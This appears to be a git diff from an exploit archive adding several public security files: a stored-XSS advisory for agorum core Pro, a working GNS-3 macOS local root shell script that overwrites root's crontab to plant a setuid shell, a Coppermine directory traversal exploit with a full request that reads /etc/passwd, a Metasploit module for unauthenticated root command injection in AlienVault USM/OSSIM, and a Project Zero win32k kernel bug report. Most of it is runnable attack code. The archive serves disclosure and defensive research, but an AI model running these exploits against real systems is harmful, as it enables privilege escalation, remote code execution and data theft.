~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Disclosure Timeline:
|
||||
|
||||
2017-01-30: Vulnerability discovered
|
||||
2017-02-06: Vulnerability reported to manufacturer
|
||||
2017-04-06: Public disclosure
|
||||
2017-04-06: Fix confirmed by manufacturer
|
||||
2017-04-12: Vulnerability published
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
References:
|
||||
|
||||
[1] Product website for agorum Software GmbH
|
||||
http://mein-dms.agorum.com/
|
||||
[2] SySS Security Advisory SYSS-2017-008
|
||||
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-008.txt
|
||||
[3] SySS Responsible Disclosure Policy
|
||||
https://www.syss.de/en/news/responsible-disclosure-policy/
|
||||
[4] Agorum Change Log
|
||||
https://d4w.agorum.com/roiwebui/files/520986548/Changelog.html
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Credits:
|
||||
|
||||
This security vulnerability was found by Dr. Erlijn van Genuchten and
|
||||
Sascha Grimmeisen of SySS GmbH.
|
||||
|
||||
E-Mail: erlijn.vangenuchten@syss.de
|
||||
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Erlijn_van_Genuchten.asc
|
||||
Key ID: 0xBD96FF2A
|
||||
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
|
||||
|
||||
E-Mail: sascha.grimmeisen@syss.de
|
||||
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Grimmeisen.asc
|
||||
Key ID: 0xD3D9C868
|
||||
Key Fingerprint: 4937 7FCF BA8E 3D80 1AAD 4AC4 7C1D E510 D3D9 C868
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Disclaimer:
|
||||
|
||||
The information provided in this security advisory is provided "as is"
|
||||
and without warranty of any kind. Details of this security advisory may
|
||||
be updated in order to provide as accurate information as possible. The
|
||||
latest version of this security advisory is available on the SySS Web
|
||||
site.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Copyright:
|
||||
|
||||
Creative Commons - Attribution (by) - Version 3.0
|
||||
URL: http://creativecommons.org/licenses/by/3.0/deed.en
|
||||
-->
|
124
platforms/multiple/webapps/41882.html
Executable file
124
platforms/multiple/webapps/41882.html
Executable file
|
@ -0,0 +1,124 @@
|
|||
<!--
|
||||
Source: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt
|
||||
|
||||
Advisory ID: SYSS-2017-005
|
||||
Product: agorum core Pro
|
||||
Manufacturer: agorum Software GmbH
|
||||
Affected Version(s): 7.8.1.4-251
|
||||
Tested Version(s): 7.8.1.4-251
|
||||
Vulnerability Type: Persistent Cross-Site Scripting (CWE-79)
|
||||
Risk Level: High
|
||||
Solution Status: Open
|
||||
Manufacturer Notification: 2017-02-06
|
||||
Solution Date: 2017-04-06
|
||||
Public Disclosure: 2017-04-12
|
||||
CVE Reference: Not yet assigned
|
||||
Author of Advisory: Dr. Erlijn van Genuchten & Sascha Grimmeisen, SySS GmbH
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Overview:
|
||||
|
||||
agorum core Pro is a module based Document Management System. It allows
|
||||
the customer to buy only required modules and can be extended when
|
||||
needed.
|
||||
|
||||
Due to the possibility to upload HTML files that can include JavaScript
|
||||
attack vectors, the DMS is vulnerable to persistent cross-site
|
||||
scripting.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Vulnerability Details:
|
||||
|
||||
SySS GmbH found out that the "file upload" function of the desk4web
|
||||
module is prone to persistent cross-site scripting attacks as users are
|
||||
allowed to upload and display HTML files that include JavaScript code.
|
||||
This code is executed in the context of other users when opening the
|
||||
file and can therefore be used to attack other users.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Proof of Concept (PoC):
|
||||
|
||||
In the desk4web module, users are able to upload files. For example,
|
||||
a file called "xssattack.html" with the following content can be
|
||||
uploaded:
|
||||
-->
|
||||
|
||||
<html>
|
||||
<head>
|
||||
</head>
|
||||
<body>
|
||||
<script>alert("XSS Attack")</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!--
|
||||
When opening this file, the message "XSS Attack" is displayed. As this
|
||||
file can be opened by other users, the included JavaScript code can be
|
||||
used to attack other users.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Solution:
|
||||
|
||||
Update to agorum core 7.11.3. [4]
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Disclosure Timeline:
|
||||
|
||||
2017-01-30: Vulnerability discovered
|
||||
2017-02-06: Vulnerability reported to manufacturer
|
||||
2017-04-06: Public disclosure
|
||||
2017-04-06: Fix confirmed by manufacturer
|
||||
2017-04-12: Vulnerability published
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
References:
|
||||
|
||||
[1] Product website for agorum Software GmbH
|
||||
http://mein-dms.agorum.com/
|
||||
[2] SySS Security Advisory SYSS-2017-005
|
||||
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2017-005.txt
|
||||
[3] SySS Responsible Disclosure Policy
|
||||
https://www.syss.de/en/news/responsible-disclosure-policy/
|
||||
[4] Agorum Change Log
|
||||
https://d4w.agorum.com/roiwebui/files/520986548/Changelog.html
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Credits:
|
||||
|
||||
This security vulnerability was found by Dr. Erlijn van Genuchten and
|
||||
Sascha Grimmeisen of SySS GmbH.
|
||||
|
||||
E-Mail: erlijn.vangenuchten@syss.de
|
||||
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Erlijn_van_Genuchten.asc
|
||||
Key ID: 0xBD96FF2A
|
||||
Key Fingerprint: 17BB 4CED 755A CBB3 2D47 C563 0CA5 8637 BD96 FF2A
|
||||
|
||||
E-Mail: sascha.grimmeisen@syss.de
|
||||
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Grimmeisen.asc
|
||||
Key ID: 0xD3D9C868
|
||||
Key Fingerprint: 4937 7FCF BA8E 3D80 1AAD 4AC4 7C1D E510 D3D9 C868
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Disclaimer:
|
||||
|
||||
The information provided in this security advisory is provided "as is"
|
||||
and without warranty of any kind. Details of this security advisory may
|
||||
be updated in order to provide as accurate information as possible. The
|
||||
latest version of this security advisory is available on the SySS Web
|
||||
site.
|
||||
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
Copyright:
|
||||
|
||||
Creative Commons - Attribution (by) - Version 3.0
|
||||
URL: http://creativecommons.org/licenses/by/3.0/deed.en
|
||||
-->
|
95
platforms/osx/local/41873.sh
Executable file
95
platforms/osx/local/41873.sh
Executable file
|
@ -0,0 +1,95 @@
|
|||
#!/bin/sh
|
||||
# GNS-3 Mac OS-X LPE local root exploit
|
||||
# =====================================
|
||||
# GNS-3 on OS-X bundles the "ubridge" binary as a setuid
|
||||
# root file. This file can be used to read arbitary files
|
||||
# using "-f" arguement but also as it runs as root can also
|
||||
# write arbitrary files with "pcap_file" arguement within
|
||||
# configuration ini file. It is possible to abuse this utility
|
||||
# to also write arbitary contents by bridging a UDP tunnel
|
||||
# and writing to disk. We can exploit these mishaps to gain
|
||||
# root privileges on a host that has GNS-3 installed by
|
||||
# writing a malicious crontab entry and escalating privileges.
|
||||
# This exploit takes advantage of this flaw to overwrite
|
||||
# root crontab with our own entry and to spawn a root shell.
|
||||
# Don't forget to clean up in /usr/lib/spool/tabs and /tmp
|
||||
# after running. Tested on GNS-3 version 1.5.2. The root user
|
||||
# must have a crontab installed (even an empty one set with
|
||||
# crontab -e) or the box rebooted after first attempt to get
|
||||
# commands to execute with this cron method.
|
||||
#
|
||||
# $ ./gns3super-osx.sh
|
||||
# [+] GNS-3 Mac OS-X local root LPE exploit 0day
|
||||
# [-] creating ubridge.ini file...
|
||||
# [-] Launching ubridge..
|
||||
# [-] Preparing cron script...
|
||||
# Parsing prdelka
|
||||
# Creating UDP tunnel 40000:127.0.0.1:40001
|
||||
# Creating UDP tunnel 50000:127.0.0.1:50001
|
||||
# Starting packet capture to /usr/lib/cron/tabs/root with protocol (null)
|
||||
# unknown link type (null), assuming Ethernet.
|
||||
# Capturing to file '/usr/lib/cron/tabs/root'
|
||||
# Source NIO listener thread for prdelka has started
|
||||
# Destination NIO listener thread for prdelka has started
|
||||
# [-] making magic packet client...
|
||||
# [-] packet fired
|
||||
# [-] Waiting a minute for the exploit magic...
|
||||
# -rwsr-xr-x 1 root wheel 1377872 Apr 12 23:32 /tmp/pdkhax
|
||||
# [-] Got Root?
|
||||
# # id
|
||||
# uid=501(hackerfantastic) gid=20(staff) euid=0(root)
|
||||
#
|
||||
# -- Hacker Fantastic (www.myhackerhouse.com)
|
||||
echo "[+] GNS-3 Mac OS-X local root LPE exploit 0day"
|
||||
echo "[-] creating ubridge.ini file..."
|
||||
cat > ubridge.ini << EOF
|
||||
[prdelka]
|
||||
source_udp = 40000:127.0.0.1:40001
|
||||
destination_udp = 50000:127.0.0.1:50001
|
||||
pcap_file = "/usr/lib/cron/tabs/root"
|
||||
EOF
|
||||
echo "[-] Launching ubridge.."
|
||||
/Applications/GNS3.app/Contents/Resources/ubridge &
|
||||
echo "[-] Preparing cron script..."
|
||||
cat > /tmp/pdk.sh << EOF
|
||||
cp /bin/ksh /tmp/pdkhax
|
||||
chown 0:0 /tmp/pdkhax
|
||||
chmod 4755 /tmp/pdkhax
|
||||
EOF
|
||||
chmod 755 /tmp/pdk.sh
|
||||
echo "[-] making magic packet client..."
|
||||
cat > udphax.c << EOF
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/types.h>
|
||||
|
||||
int main(int argc, char* argv[]) {
|
||||
struct sockaddr_in si_other, srcaddr;
|
||||
int s, i, slen=sizeof(si_other);
|
||||
char* pkt = "\n* * * * * /tmp/pdk.sh\n\n";
|
||||
s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
|
||||
memset((char *) &si_other, 0, sizeof(si_other));
|
||||
si_other.sin_family = AF_INET;
|
||||
si_other.sin_port = htons(50000);
|
||||
inet_aton("127.0.0.1", &si_other.sin_addr);
|
||||
srcaddr.sin_family = AF_INET;
|
||||
srcaddr.sin_addr.s_addr = htonl(INADDR_ANY);
|
||||
srcaddr.sin_port = htons(50001);
|
||||
bind(s,(struct sockaddr *) &srcaddr, sizeof(srcaddr));
|
||||
sendto(s,pkt,strlen(pkt),0,(struct sockaddr *)&si_other, slen);
|
||||
printf("[-] packet fired\n");
|
||||
}
|
||||
EOF
|
||||
gcc udphax.c -o udphax
|
||||
./udphax
|
||||
echo "[-] Waiting a minute for the exploit magic..."
|
||||
rm -rf udphax* ubridge.ini
|
||||
pkill ubridge
|
||||
sleep 60
|
||||
rm -rf /tmp/pdk.sh
|
||||
ls -al /tmp/pdkhax
|
||||
echo "[-] Got Root?"
|
||||
/tmp/pdkhax
|
90
platforms/php/webapps/41876.txt
Executable file
90
platforms/php/webapps/41876.txt
Executable file
|
@ -0,0 +1,90 @@
|
|||
Coppermine Gallery <= 1.5.44 directory traversal vulnerability
|
||||
==============================================================
|
||||
Coppermine is a multi-purpose fully-featured and integrated web
|
||||
picture gallery script written in PHP using GD or ImageMagick as
|
||||
image library with a MySQL backend. A directory travesal vuln
|
||||
exists within the "save_thumb" function of the "crop & rotate"
|
||||
image feature. This can be accessed from pic_editor.php. First
|
||||
upload a file, e.g. "hackerhouse.png" to an album. This will
|
||||
create a predictable file path location with your userid e.g:
|
||||
|
||||
http://target/cpg15x/albums/userpics/10001/hackerhouse.png
|
||||
|
||||
You will then send a POST request to pic_editor to manipulate
|
||||
this file but replace the "new_image" with the filepath you
|
||||
want to read such as "../../../../../etc/passwd". Your file
|
||||
will then by copied to a predictible path location as thumb.
|
||||
|
||||
http://target/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
|
||||
|
||||
To exploit this vulnerability you will need to be able to
|
||||
register an account and upload files to a photo album. You
|
||||
do not need admin rights to exploit this flaw. All versions
|
||||
from cpg 1.4.14 to cpg 1.5.44 have been found vulnerable
|
||||
to this flaw. The coppermine configuration was tested with
|
||||
ImageMagick enabled, your mileage may vary with GD1.x/GD2.x.
|
||||
|
||||
To protect against this exploit do not allow public registration
|
||||
requests and only allow trusted users to modify images.
|
||||
|
||||
Example POST request
|
||||
====================
|
||||
POST /cpg15x/pic_editor.php HTTP/1.1
|
||||
Host: target
|
||||
Content-Length: 802
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
Accept: text/html,
|
||||
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
|
||||
Cookie: <cookies>
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
Content-Disposition: form-data; name="clipval"
|
||||
|
||||
10
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
Content-Disposition: form-data; name="newimage"
|
||||
|
||||
../../../../../../../../../../../../../../etc/passwd
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
Content-Disposition: form-data; name="img_dir"
|
||||
|
||||
albums/edit/
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
Content-Disposition: form-data; name="id"
|
||||
|
||||
1
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
Content-Disposition: form-data; name="angle"
|
||||
|
||||
45
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
100
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF
|
||||
Content-Disposition: form-data; name="save_thumb"
|
||||
|
||||
Save as thumbnail
|
||||
------WebKitFormBoundaryAE29AdEqShlpLpDF--
|
||||
|
||||
Example file download request
|
||||
=============================
|
||||
$ curl http://targetip/cpg15x/albums/userpics/10001/thumb_hackerhouse.png
|
||||
root:x:0:0:root:/root:/bin/bash
|
||||
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
|
||||
bin:x:2:2:bin:/bin:/usr/sbin/nologin
|
||||
sys:x:3:3:sys:/dev:/usr/sbin/nologin
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
... snip
|
||||
|
||||
An additional directory traversal vulnerability is present
|
||||
in "showthumb.php" which can be used to stat() for the existence
|
||||
of files by reviewing the error returned. You must have
|
||||
sufficient rights to use this feature however.
|
||||
|
||||
/cpg15x/showthumb.php?picfile=../../../../../../etc/passwd
|
||||
/cpg15x/showthumb.php?picfile=../../../../../../etc/non-existantfile
|
||||
|
||||
-- Hacker Fantastic
|
||||
(http://www.myhackerhouse.com)
|
91
platforms/php/webapps/41884.rb
Executable file
91
platforms/php/webapps/41884.rb
Executable file
|
@ -0,0 +1,91 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'AlienVault USM/OSSIM API Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an unauthenticated command injection in Alienvault USM/OSSIM versions 5.3.4 and 5.3.5. The vulnerability lies in an API function that does not check for authentication and then passes user input directly to a system call as root.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # Privately disclosed to Alienvault
|
||||
'Peter Lapp (lappsec@gmail.com)' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'https://www.alienvault.com/forums/discussion/8415/']
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' => {
|
||||
'PayloadType' => 'cmd'
|
||||
}
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', { }]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Feb 5 2017'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(40011)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, '/av/api/1.0/system/local/network/fqdn'),
|
||||
'vars_post' => {
|
||||
'host_ip' => "127.0.0.1"
|
||||
},
|
||||
'headers' => {
|
||||
'Accept' => "application/json"
|
||||
}
|
||||
})
|
||||
|
||||
if res and res.code == 200 and res.body.include?('success')
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
print_status("Executing payload...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, '/av/api/1.0/system/local/network/fqdn'),
|
||||
'vars_post' => {
|
||||
'host_ip' => ";#{payload.encoded}"
|
||||
},
|
||||
'headers' => {
|
||||
'Accept' => "application/json"
|
||||
}
|
||||
})
|
||||
end
|
||||
|
||||
|
||||
end
|
|
@ -48,4 +48,3 @@ ls -al /usr/lib/locale | grep pdkhax
|
|||
rm -rf /var/dt/appconfig/appmanager
|
||||
chmod 755 /usr/lib/locale/pdkhax
|
||||
echo [-] Done. "/usr/lib/locale/pdkhax" is writeable
|
||||
|
||||
|
|
154
platforms/windows/dos/41879.txt
Executable file
154
platforms/windows/dos/41879.txt
Executable file
|
@ -0,0 +1,154 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1078
|
||||
|
||||
We have discovered two bugs in the implementation of the win32k!NtGdiGetDIBitsInternal system call, which is a part of the graphic subsystem in all modern versions of Windows. The issues can potentially lead to kernel pool memory disclosure (bug #1) or denial of service (bug #1 and #2). Under certain circumstances, memory corruption could also be possible.
|
||||
|
||||
----------[ Double-fetch while handling the BITMAPINFOHEADER structure ]----------
|
||||
|
||||
At the beginning of the win32k!NtGdiGetDIBitsInternal system call handler, the code references the BITMAPINFOHEADER structure (and specifically its .biSize field) several times, in order to correctly calculate its size and capture it into kernel-mode memory. A pseudo-code representation of the relevant code is shown below, where "bmi" is a user-controlled address:
|
||||
|
||||
--- cut ---
|
||||
ProbeForRead(bmi, 4, 1);
|
||||
ProbeForWrite(bmi, bmi->biSize, 1); <------------ Fetch #1
|
||||
|
||||
header_size = GreGetBitmapSize(bmi); <----------- Fetch #2
|
||||
captured_bmi = Alloc(header_size);
|
||||
|
||||
ProbeForRead(bmi, header_size, 1);
|
||||
memcpy(captured_bmi, bmi, header_size); <-------- Fetch #3
|
||||
|
||||
new_header_size = GreGetBitmapSize(bmi);
|
||||
if (header_size != new_header_size) {
|
||||
// Bail out.
|
||||
}
|
||||
|
||||
// Process the data further.
|
||||
--- cut ---
|
||||
|
||||
In the snippet above, we can see that the user-mode "bmi" buffer is accessed thrice: when accessing the biSize field, in the GreGetBitmapSize() call, and in the final memcpy() call. While this is clearly a multi-fetch condition, it is mostly harmless: since there is a ProbeForRead() call for "bmi", it must be a user-mode address, so bypassing the subsequent ProbeForWrite() call by setting bmi->biSize to 0 doesn't change much. Furthermore, since the two results of the GreGetBitmapSize() calls are eventually compared, introducing any inconsistencies in between them is instantly detected.
|
||||
|
||||
As far as we are concerned, the only invalid outcome of the behavior could be read access to out-of-bounds pool memory in the second GreGetBitmapSize() call. This is achieved in the following way:
|
||||
|
||||
1. Invoke NtGdiGetDIBitsInternal with a structure having the biSize field set to 12 (sizeof(BITMAPCOREHEADER)).
|
||||
2. The first call to GreGetBitmapSize() now returns 12 or a similar small value.
|
||||
3. This number of bytes is allocated for the header buffer.
|
||||
4. (In a second thread) Change the value of the biSize field to 40 (sizeof(BITMAPINFOHEADER)) before the memcpy() call.
|
||||
5. memcpy() copies the small structure (with incorrectly large biSize) into the pool allocation.
|
||||
6. When called again, the GreGetBitmapSize() function assumes that the biSize field is set adequately to the size of the corresponding memory area (untrue), and attempts to access structure fields at offsets greater than 12.
|
||||
|
||||
The bug is easiest to reproduce with Special Pools enabled for win32k.sys, as the invalid memory read will then be reliably detected and will yield a system bugcheck. An excerpt from a kernel crash log triggered using the bug in question is shown below:
|
||||
|
||||
--- cut ---
|
||||
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
|
||||
N bytes of memory was allocated and more than N bytes are being referenced.
|
||||
This cannot be protected by try-except.
|
||||
When possible, the guilty driver's name (Unicode string) is printed on
|
||||
the bugcheck screen and saved in KiBugCheckDriver.
|
||||
Arguments:
|
||||
Arg1: fe3ff008, memory referenced
|
||||
Arg2: 00000000, value 0 = read operation, 1 = write operation
|
||||
Arg3: 943587f1, if non-zero, the address which referenced memory.
|
||||
Arg4: 00000000, (reserved)
|
||||
|
||||
Debugging Details:
|
||||
------------------
|
||||
|
||||
[...]
|
||||
|
||||
TRAP_FRAME: 92341b1c -- (.trap 0xffffffff92341b1c)
|
||||
ErrCode = 00000000
|
||||
eax=fe3fefe8 ebx=00000000 ecx=00000000 edx=00000028 esi=00000004 edi=01240000
|
||||
eip=943587f1 esp=92341b90 ebp=92341b98 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246
|
||||
win32k!GreGetBitmapSize+0x34:
|
||||
943587f1 8b7820 mov edi,dword ptr [eax+20h] ds:0023:fe3ff008=????????
|
||||
Resetting default scope
|
||||
|
||||
LAST_CONTROL_TRANSFER: from 816f9dff to 816959d8
|
||||
|
||||
STACK_TEXT:
|
||||
9234166c 816f9dff 00000003 09441320 00000065 nt!RtlpBreakWithStatusInstruction
|
||||
923416bc 816fa8fd 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x1c
|
||||
92341a80 816a899d 00000050 fe3ff008 00000000 nt!KeBugCheck2+0x68b
|
||||
92341b04 8165af98 00000000 fe3ff008 00000000 nt!MmAccessFault+0x104
|
||||
92341b04 943587f1 00000000 fe3ff008 00000000 nt!KiTrap0E+0xdc
|
||||
92341b98 9434383e fe3fefe8 00000000 067f9cd5 win32k!GreGetBitmapSize+0x34
|
||||
92341c08 81657db6 00000000 00000001 00000000 win32k!NtGdiGetDIBitsInternal+0x17f
|
||||
92341c08 011d09e1 00000000 00000001 00000000 nt!KiSystemServicePostCall
|
||||
[...]
|
||||
--- cut ---
|
||||
|
||||
The out-of-bounds data read by GreGetBitmapSize() could then be extracted back to user-mode to some degree, which could help disclose sensitive data or defeat certain kernel security mitigations (such as kASLR).
|
||||
|
||||
Attached is a PoC program for Windows 7 32-bit (double_fetch_oob_read.cpp).
|
||||
|
||||
----------[ Unhandled out-of-bounds write to user-mode memory when requesting RLE-compressed bitmaps ]----------
|
||||
|
||||
The 5th parameter of the NtGdiGetDIBitsInternal syscall is a pointer to an output buffer where the bitmap data should be written to. The length of the buffer is specified in the 8th parameter, and can be optionally 0. The logic of sanitizing and locking the memory area is shown below ("Buffer" is the 5th argument and "Length" is the 8th).
|
||||
|
||||
--- cut ---
|
||||
if (Length != 0 || (Length = GreGetBitmapSize(bmi)) != 0) {
|
||||
ProbeForWrite(Buffer, Length, 4);
|
||||
MmSecureVirtualMemory(Buffer, Length, PAGE_READWRITE);
|
||||
}
|
||||
--- cut ---
|
||||
|
||||
We can see that if the "Length" argument is non-zero, it is prioritized over the result of GreGetBitmapSize() in specifying how many bytes of the user-mode output buffer should be locked in memory as readable/writeable. Since the two calls above are supposed to guarantee that the required user-mode memory region will be accessible until it is unlocked, the call to the GreGetDIBitsInternal() function which actually fills the buffer with data is not guarded with a try/except block.
|
||||
|
||||
However, if we look into GreGetDIBitsInternal() and further into GreGetDIBitsInternalWorker(), we can see that if a RLE-compressed bitmap is requested by the user (as indicated by bmi.biCompression set to BI_RLE[4,8]), the internal EncodeRLE4() and EncodeRLE8() routines are responsible for writing the output data. The legal size of the buffer is passed through the functions' 5th parameter (last one), and is always set to bmi.biSizeImage. This creates a discrepancy: a different number of bytes is ensured to be present in memory (Length), and a different number can be actually written to it (bmi.biSizeImage). Due to the lack of exception handling in this code area, the resulting exception causes a system-wide bugcheck:
|
||||
|
||||
--- cut ---
|
||||
KERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)
|
||||
This is a very common bugcheck. Usually the exception address pinpoints
|
||||
the driver/function that caused the problem. Always note this address
|
||||
as well as the link date of the driver/image that contains this address.
|
||||
Some common problems are exception code 0x80000003. This means a hard
|
||||
coded breakpoint or assertion was hit, but this system was booted
|
||||
/NODEBUG. This is not supposed to happen as developers should never have
|
||||
hardcoded breakpoints in retail code, but ...
|
||||
If this happens, make sure a debugger gets connected, and the
|
||||
system is booted /DEBUG. This will let us see why this breakpoint is
|
||||
happening.
|
||||
Arguments:
|
||||
Arg1: c0000005, The exception code that was not handled
|
||||
Arg2: 9461564b, The address that the exception occurred at
|
||||
Arg3: 9d0539a0, Trap Frame
|
||||
Arg4: 00000000
|
||||
|
||||
Debugging Details:
|
||||
------------------
|
||||
|
||||
[...]
|
||||
|
||||
TRAP_FRAME: 9d0539a0 -- (.trap 0xffffffff9d0539a0)
|
||||
ErrCode = 00000002
|
||||
eax=00291002 ebx=00291000 ecx=00000004 edx=fe9bb1c1 esi=00000064 edi=fe9bb15c
|
||||
eip=9461564b esp=9d053a14 ebp=9d053a40 iopl=0 nv up ei ng nz ac pe cy
|
||||
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010297
|
||||
win32k!EncodeRLE8+0x1ac:
|
||||
9461564b c60300 mov byte ptr [ebx],0 ds:0023:00291000=??
|
||||
Resetting default scope
|
||||
|
||||
[...]
|
||||
|
||||
STACK_TEXT:
|
||||
9d052f5c 8172adff 00000003 17305ce1 00000065 nt!RtlpBreakWithStatusInstruction
|
||||
9d052fac 8172b8fd 00000003 9d0533b0 00000000 nt!KiBugCheckDebugBreak+0x1c
|
||||
9d053370 8172ac9c 0000008e c0000005 9461564b nt!KeBugCheck2+0x68b
|
||||
9d053394 817002f7 0000008e c0000005 9461564b nt!KeBugCheckEx+0x1e
|
||||
9d053930 81689996 9d05394c 00000000 9d0539a0 nt!KiDispatchException+0x1ac
|
||||
9d053998 8168994a 9d053a40 9461564b badb0d00 nt!CommonDispatchException+0x4a
|
||||
9d053a40 944caea9 fe9bb1c1 ff290ffc 00000064 nt!KiExceptionExit+0x192
|
||||
9d053b04 944e8b09 00000028 9d053b5c 9d053b74 win32k!GreGetDIBitsInternalWorker+0x73e
|
||||
9d053b7c 944d390f 0c0101fb 1f050140 00000000 win32k!GreGetDIBitsInternal+0x21b
|
||||
9d053c08 81688db6 0c0101fb 1f050140 00000000 win32k!NtGdiGetDIBitsInternal+0x250
|
||||
9d053c08 00135ba6 0c0101fb 1f050140 00000000 nt!KiSystemServicePostCall
|
||||
[...]
|
||||
--- cut ---
|
||||
|
||||
While the size of the buffer passed to EncodeRLE[4,8] can be arbitrarily controlled through bmi.biSizeImage (32-bit field), it doesn't enable an attacker to corrupt kernel-mode memory, as the memory writing takes place sequentially from the beginning to the end of the buffer. Furthermore, since the code in NtGdiGetDIBitsInternal() makes sure that the buffer size passed to ProbeForWrite() is >= 1, its base address must reside in user space. As such, this appears to be a DoS issue only, if we haven't missed anything in our analysis.
|
||||
|
||||
Attached is a PoC program for Windows 7 32-bit (usermode_oob_write.cpp), and a bitmap file necessary for the exploit to work (test.bmp).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
